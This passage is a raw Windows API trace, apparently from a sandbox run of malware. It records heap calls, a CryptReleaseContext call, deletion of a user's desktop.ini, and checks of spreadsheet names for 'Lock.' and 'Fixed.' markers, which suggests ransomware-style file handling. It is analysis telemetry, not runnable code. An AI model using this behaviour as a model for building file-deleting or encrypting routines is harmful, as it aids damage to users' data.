[0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.049] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.051] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.051] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.052] FreeLibrary (hLibModule=0x756e0000) returned 1 [0263.052] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.052] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.052] CloseHandle (hObject=0x2a0) returned 1 [0263.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0263.056] CloseHandle (hObject=0x2d0) returned 1 [0263.060] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0263.061] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0263.061] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.061] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x25 [0263.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0263.062] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 0x26 [0263.062] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87250 [0263.062] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 1 [0263.063] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0263.063] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.064] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.064] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0263.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0263.065] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x25 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0263.065] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 0xffffffff [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.066] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0263.066] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.066] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0263.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fuv1mdjpidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uv1mdjpidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v1mdjpidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1mdjpidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mdjpidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="djpidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pidzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="idzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dzq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zq-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HGh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gh.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0263.068] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0263.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0263.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0263.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fuv1mdjpidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uv1mdjpidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v1mdjpidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1mdjpidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mdjpidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="djpidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pidzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="idzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dzq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zq-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HGh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gh.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: 